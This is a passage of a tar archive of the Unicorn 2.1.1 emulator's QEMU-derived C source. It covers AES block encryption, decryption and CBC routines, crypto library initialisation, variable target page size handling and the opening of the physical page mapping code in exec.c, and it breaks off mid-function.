rk[44]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[45]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[46]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[47]; if (key->rounds > 12) { /* round 12: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[48]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[49]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[50]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[51]; /* round 13: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[52]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[53]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[54]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[55]; } } rk += key->rounds << 2; #else /* !FULL_UNROLL */ /* * Nr - 1 full rounds: */ r = key->rounds >> 1; for (;;) { t0 = AES_Te0[(s0 >> 24) ] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[(s3 ) & 0xff] ^ rk[4]; t1 = AES_Te0[(s1 >> 24) ] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[(s0 ) & 0xff] ^ rk[5]; t2 = AES_Te0[(s2 >> 24) ] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[(s1 ) & 0xff] ^ rk[6]; t3 = AES_Te0[(s3 >> 24) ] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[(s2 ) & 0xff] ^ rk[7]; rk += 8; if (--r == 0) { break; } s0 = AES_Te0[(t0 >> 24) ] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[(t3 ) & 0xff] ^ rk[0]; s1 = AES_Te0[(t1 >> 24) ] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[(t0 ) & 0xff] ^ rk[1]; s2 = AES_Te0[(t2 >> 24) ] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[(t1 ) & 0xff] ^ rk[2]; s3 = AES_Te0[(t3 >> 24) ] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[(t2 ) & 0xff] ^ rk[3]; } #endif /* ?FULL_UNROLL */ /* * apply last round and * map cipher state to byte array block: */ s0 = (AES_Te4[(t0 >> 24) ] & 0xff000000) ^ (AES_Te4[(t1 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(t2 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(t3 ) & 0xff] & 0x000000ff) ^ rk[0]; PUTU32(out , s0); s1 = (AES_Te4[(t1 >> 24) ] & 0xff000000) ^ (AES_Te4[(t2 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(t3 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(t0 ) & 0xff] & 0x000000ff) ^ rk[1]; PUTU32(out + 4, s1); s2 = (AES_Te4[(t2 >> 24) ] & 0xff000000) ^ (AES_Te4[(t3 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(t0 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(t1 ) & 0xff] & 0x000000ff) ^ rk[2]; PUTU32(out + 8, s2); s3 = (AES_Te4[(t3 >> 24) ] & 0xff000000) ^ (AES_Te4[(t0 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(t1 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(t2 ) & 0xff] & 0x000000ff) ^ rk[3]; PUTU32(out + 12, s3); } /* * Decrypt a single block * in and out can overlap */ void AES_decrypt(const unsigned char *in, unsigned char *out, const AES_KEY *key) { const u32 *rk; u32 s0, s1, s2, s3, t0, t1, t2, t3; #ifndef FULL_UNROLL int r; #endif /* ?FULL_UNROLL */ assert(in && out && key); rk = key->rd_key; /* * map byte array block to cipher state * and add initial round key: */ s0 = GETU32(in ) ^ rk[0]; s1 = GETU32(in + 4) ^ rk[1]; s2 = GETU32(in + 8) ^ rk[2]; s3 = GETU32(in + 12) ^ rk[3]; #ifdef FULL_UNROLL /* round 1: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[ 4]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[ 5]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[ 6]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[ 7]; /* round 2: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[ 8]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[ 9]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[10]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[11]; /* round 3: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[12]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[13]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[14]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[15]; /* round 4: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[16]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[17]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[18]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[19]; /* round 5: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[20]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[21]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[22]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[23]; /* round 6: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[24]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[25]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[26]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[27]; /* round 7: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[28]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[29]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[30]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[31]; /* round 8: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[32]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[33]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[34]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[35]; /* round 9: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[36]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[37]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[38]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[39]; if (key->rounds > 10) { /* round 10: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[40]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[41]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[42]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[43]; /* round 11: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[44]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[45]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[46]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[47]; if (key->rounds > 12) { /* round 12: */ s0 = AES_Td0[t0 >> 24] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[t1 & 0xff] ^ rk[48]; s1 = AES_Td0[t1 >> 24] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[t2 & 0xff] ^ rk[49]; s2 = AES_Td0[t2 >> 24] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[t3 & 0xff] ^ rk[50]; s3 = AES_Td0[t3 >> 24] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[t0 & 0xff] ^ rk[51]; /* round 13: */ t0 = AES_Td0[s0 >> 24] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[s1 & 0xff] ^ rk[52]; t1 = AES_Td0[s1 >> 24] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[s2 & 0xff] ^ rk[53]; t2 = AES_Td0[s2 >> 24] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[s3 & 0xff] ^ rk[54]; t3 = AES_Td0[s3 >> 24] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[s0 & 0xff] ^ rk[55]; } } rk += key->rounds << 2; #else /* !FULL_UNROLL */ /* * Nr - 1 full rounds: */ r = key->rounds >> 1; for (;;) { t0 = AES_Td0[(s0 >> 24) ] ^ AES_Td1[(s3 >> 16) & 0xff] ^ AES_Td2[(s2 >> 8) & 0xff] ^ AES_Td3[(s1 ) & 0xff] ^ rk[4]; t1 = AES_Td0[(s1 >> 24) ] ^ AES_Td1[(s0 >> 16) & 0xff] ^ AES_Td2[(s3 >> 8) & 0xff] ^ AES_Td3[(s2 ) & 0xff] ^ rk[5]; t2 = AES_Td0[(s2 >> 24) ] ^ AES_Td1[(s1 >> 16) & 0xff] ^ AES_Td2[(s0 >> 8) & 0xff] ^ AES_Td3[(s3 ) & 0xff] ^ rk[6]; t3 = AES_Td0[(s3 >> 24) ] ^ AES_Td1[(s2 >> 16) & 0xff] ^ AES_Td2[(s1 >> 8) & 0xff] ^ AES_Td3[(s0 ) & 0xff] ^ rk[7]; rk += 8; if (--r == 0) { break; } s0 = AES_Td0[(t0 >> 24) ] ^ AES_Td1[(t3 >> 16) & 0xff] ^ AES_Td2[(t2 >> 8) & 0xff] ^ AES_Td3[(t1 ) & 0xff] ^ rk[0]; s1 = AES_Td0[(t1 >> 24) ] ^ AES_Td1[(t0 >> 16) & 0xff] ^ AES_Td2[(t3 >> 8) & 0xff] ^ AES_Td3[(t2 ) & 0xff] ^ rk[1]; s2 = AES_Td0[(t2 >> 24) ] ^ AES_Td1[(t1 >> 16) & 0xff] ^ AES_Td2[(t0 >> 8) & 0xff] ^ AES_Td3[(t3 ) & 0xff] ^ rk[2]; s3 = AES_Td0[(t3 >> 24) ] ^ AES_Td1[(t2 >> 16) & 0xff] ^ AES_Td2[(t1 >> 8) & 0xff] ^ AES_Td3[(t0 ) & 0xff] ^ rk[3]; } #endif /* ?FULL_UNROLL */ /* * apply last round and * map cipher state to byte array block: */ s0 = (AES_Td4[(t0 >> 24) ] & 0xff000000) ^ (AES_Td4[(t3 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Td4[(t2 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Td4[(t1 ) & 0xff] & 0x000000ff) ^ rk[0]; PUTU32(out , s0); s1 = (AES_Td4[(t1 >> 24) ] & 0xff000000) ^ (AES_Td4[(t0 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Td4[(t3 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Td4[(t2 ) & 0xff] & 0x000000ff) ^ rk[1]; PUTU32(out + 4, s1); s2 = (AES_Td4[(t2 >> 24) ] & 0xff000000) ^ (AES_Td4[(t1 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Td4[(t0 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Td4[(t3 ) & 0xff] & 0x000000ff) ^ rk[2]; PUTU32(out + 8, s2); s3 = (AES_Td4[(t3 >> 24) ] & 0xff000000) ^ (AES_Td4[(t2 >> 16) & 0xff] & 0x00ff0000) ^ (AES_Td4[(t1 >> 8) & 0xff] & 0x0000ff00) ^ (AES_Td4[(t0 ) & 0xff] & 0x000000ff) ^ rk[3]; PUTU32(out + 12, s3); } #endif /* AES_ASM */ void AES_cbc_encrypt(const unsigned char *in, unsigned char *out, const unsigned long length, const AES_KEY *key, unsigned char *ivec, const int enc) { unsigned long n; unsigned long len = length; unsigned char tmp[AES_BLOCK_SIZE]; assert(in && out && key && ivec); if (enc) { while (len >= AES_BLOCK_SIZE) { for(n=0; n < AES_BLOCK_SIZE; ++n) tmp[n] = in[n] ^ ivec[n]; AES_encrypt(tmp, out, key); memcpy(ivec, out, AES_BLOCK_SIZE); len -= AES_BLOCK_SIZE; in += AES_BLOCK_SIZE; out += AES_BLOCK_SIZE; } if (len) { for(n=0; n < len; ++n) tmp[n] = in[n] ^ ivec[n]; for(n=len; n < AES_BLOCK_SIZE; ++n) tmp[n] = ivec[n]; AES_encrypt(tmp, tmp, key); memcpy(out, tmp, AES_BLOCK_SIZE); memcpy(ivec, tmp, AES_BLOCK_SIZE); } } else { while (len >= AES_BLOCK_SIZE) { memcpy(tmp, in, AES_BLOCK_SIZE); AES_decrypt(in, out, key); for(n=0; n < AES_BLOCK_SIZE; ++n) out[n] ^= ivec[n]; memcpy(ivec, tmp, AES_BLOCK_SIZE); len -= AES_BLOCK_SIZE; in += AES_BLOCK_SIZE; out += AES_BLOCK_SIZE; } if (len) { memcpy(tmp, in, AES_BLOCK_SIZE); AES_decrypt(tmp, tmp, key); for(n=0; n < len; ++n) out[n] = tmp[n] ^ ivec[n]; memcpy(ivec, tmp, AES_BLOCK_SIZE); } } } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/crypto/init.c��������������������������������������������������������������������0000664�0000000�0000000�00000004332�14675241067�0016604�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU Crypto initialization * * Copyright (c) 2015 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ #include "qemu/osdep.h" #include "crypto/init.h" #include "qapi/error.h" #include "qemu/thread.h" #ifdef CONFIG_GNUTLS #include <gnutls/gnutls.h> #include <gnutls/crypto.h> #endif #ifdef CONFIG_GCRYPT #include <gcrypt.h> #endif #include "crypto/random.h" /* #define DEBUG_GNUTLS */ /* * We need to init gcrypt threading if * * - gcrypt < 1.6.0 * */ #if (defined(CONFIG_GCRYPT) && \ (GCRYPT_VERSION_NUMBER < 0x010600)) #define QCRYPTO_INIT_GCRYPT_THREADS #else #undef QCRYPTO_INIT_GCRYPT_THREADS #endif #ifdef DEBUG_GNUTLS static void qcrypto_gnutls_log(int level, const char *str) { fprintf(stderr, "%d: %s", level, str); } #endif int qcrypto_init(void) { #ifdef QCRYPTO_INIT_GCRYPT_THREADS gcry_control(GCRYCTL_SET_THREAD_CBS, &qcrypto_gcrypt_thread_impl); #endif /* QCRYPTO_INIT_GCRYPT_THREADS */ #ifdef CONFIG_GNUTLS int ret; ret = gnutls_global_init(); if (ret < 0) { // error_setg(errp, // "Unable to initialize GNUTLS library: %s", // gnutls_strerror(ret)); return -1; } #ifdef DEBUG_GNUTLS gnutls_global_set_log_level(10); gnutls_global_set_log_function(qcrypto_gnutls_log); #endif #endif #ifdef CONFIG_GCRYPT if (!gcry_check_version(GCRYPT_VERSION)) { // error_setg(errp, "Unable to initialize gcrypt"); return -1; } gcry_control(GCRYCTL_INITIALIZATION_FINISHED, 0); #endif if (qcrypto_random_init() < 0) { return -1; } return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/exec-vary.c����������������������������������������������������������������������0000664�0000000�0000000�00000004620�14675241067�0016224�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Variable page size handling * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu-common.h" #define IN_EXEC_VARY 1 #include "exec/exec-all.h" #include <uc_priv.h> bool set_preferred_target_page_bits(struct uc_struct *uc, int bits) { /* * The target page size is the lowest common denominator for all * the CPUs in the system, so we can only make it smaller, never * larger. And we can't make it smaller once we've committed to * a particular size. */ #ifdef TARGET_PAGE_BITS_VARY //assert(bits >= TARGET_PAGE_BITS_MIN); if (uc->init_target_page == NULL) { uc->init_target_page = calloc(1, sizeof(TargetPageBits)); } else { return false; } if (bits < TARGET_PAGE_BITS_MIN) { return false; } if (uc->init_target_page->bits == 0 || uc->init_target_page->bits > bits) { if (uc->init_target_page->decided) { return false; } uc->init_target_page->bits = bits; } #endif return true; } void finalize_target_page_bits(struct uc_struct *uc) { #ifdef TARGET_PAGE_BITS_VARY if (uc->init_target_page == NULL) { uc->init_target_page = calloc(1, sizeof(TargetPageBits)); } else { return; } if (uc->target_bits != 0) { uc->init_target_page->bits = uc->target_bits; } if (uc->init_target_page->bits == 0) { uc->init_target_page->bits = TARGET_PAGE_BITS_MIN; } uc->init_target_page->mask = ((target_ulong)-1) << uc->init_target_page->bits; uc->init_target_page->decided = true; /* * For the benefit of an -flto build, prevent the compiler from * hoisting a read from target_page before we finish initializing. */ barrier(); #endif } ����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/exec.c���������������������������������������������������������������������������0000664�0000000�0000000�00000200135�14675241067�0015244�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Virtual page mapping * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu-common.h" #include "exec/cpu-defs.h" #include "cpu.h" #include "qemu/cutils.h" #include "exec/exec-all.h" #include "exec/target_page.h" #include "tcg/tcg.h" #include "sysemu/sysemu.h" #include "sysemu/tcg.h" #include "qemu/timer.h" #include "exec/memory.h" #include "exec/ioport.h" #ifdef CONFIG_FALLOCATE_PUNCH_HOLE #include <linux/falloc.h> #endif #include "accel/tcg/translate-all.h" #include "exec/memory-internal.h" #include "exec/ram_addr.h" #include "qemu/range.h" #include "qemu/rcu_queue.h" #include "uc_priv.h" typedef struct PhysPageEntry PhysPageEntry; struct PhysPageEntry { /* How many bits skip to next level (in units of L2_SIZE). 0 for a leaf. */ uint32_t skip : 6; /* index into phys_sections (!skip) or phys_map_nodes (skip) */ uint32_t ptr : 26; }; #define PHYS_MAP_NODE_NIL (((uint32_t)~0) >> 6) /* Size of the L2 (and L3, etc) page tables. */ #define ADDR_SPACE_BITS 64 #define P_L2_BITS 9 #define P_L2_SIZE (1 << P_L2_BITS) #define P_L2_LEVELS (((ADDR_SPACE_BITS - TARGET_PAGE_BITS - 1) / P_L2_BITS) + 1) typedef PhysPageEntry Node[P_L2_SIZE]; typedef struct PhysPageMap { unsigned sections_nb; unsigned sections_nb_alloc; unsigned nodes_nb; unsigned nodes_nb_alloc; Node *nodes; MemoryRegionSection *sections; } PhysPageMap; struct AddressSpaceDispatch { MemoryRegionSection *mru_section; /* This is a multi-level map on the physical address space. * The bottom level has pointers to MemoryRegionSections. */ PhysPageEntry phys_map; PhysPageMap map; struct uc_struct *uc; }; #define SUBPAGE_IDX(addr) ((addr) & ~TARGET_PAGE_MASK) typedef struct subpage_t { MemoryRegion iomem; FlatView *fv; hwaddr base; uint16_t sub_section[]; } subpage_t; #define PHYS_SECTION_UNASSIGNED 0 static void tcg_commit(MemoryListener *listener); /** * CPUAddressSpace: all the information a CPU needs about an AddressSpace * @cpu: the CPU whose AddressSpace this is * @as: the AddressSpace itself * @memory_dispatch: its dispatch pointer (cached, RCU protected) * @tcg_as_listener: listener for tracking changes to the AddressSpace */ struct CPUAddressSpace { CPUState *cpu; AddressSpace *as; struct AddressSpaceDispatch *memory_dispatch; MemoryListener tcg_as_listener; }; static void phys_map_node_reserve(AddressSpaceDispatch *d, PhysPageMap *map, unsigned nodes) { if (map->nodes_nb + nodes > map->nodes_nb_alloc) { map->nodes_nb_alloc = MAX(d->uc->alloc_hint, map->nodes_nb + nodes); map->nodes = g_renew(Node, map->nodes, map->nodes_nb_alloc); d->uc->alloc_hint = map->nodes_nb_alloc; } } static uint32_t phys_map_node_alloc(PhysPageMap *map, bool leaf) { unsigned i; uint32_t ret; PhysPageEntry e; PhysPageEntry *p; ret = map->nodes_nb++; p = map->nodes[ret]; assert(ret != PHYS_MAP_NODE_NIL); assert(ret != map->nodes_nb_alloc); e.skip = leaf ? 0 : 1; e.ptr = leaf ? PHYS_SECTION_UNASSIGNED : PHYS_MAP_NODE_NIL; for (i = 0; i < P_L2_SIZE; ++i) { memcpy(&p[i], &e, sizeof(e)); } return ret; } static void phys_page_set_level(PhysPageMap *map, PhysPageEntry *lp, hwaddr *index, uint64_t *nb, uint16_t leaf, int level) { PhysPageEntry *p; hwaddr step = (hwaddr)1 << (level * P_L2_BITS); if (lp->skip && lp->ptr == PHYS_MAP_NODE_NIL) { lp->ptr = phys_map_node_alloc(map, level == 0); } p = map->nodes[lp->ptr]; lp = &p[(*index >> (level * P_L2_BITS)) & (P_L2_SIZE - 1)]; while (*nb && lp < &p[P_L2_SIZE]) { if ((*index & (step - 1)) == 0 && *nb >= step) { 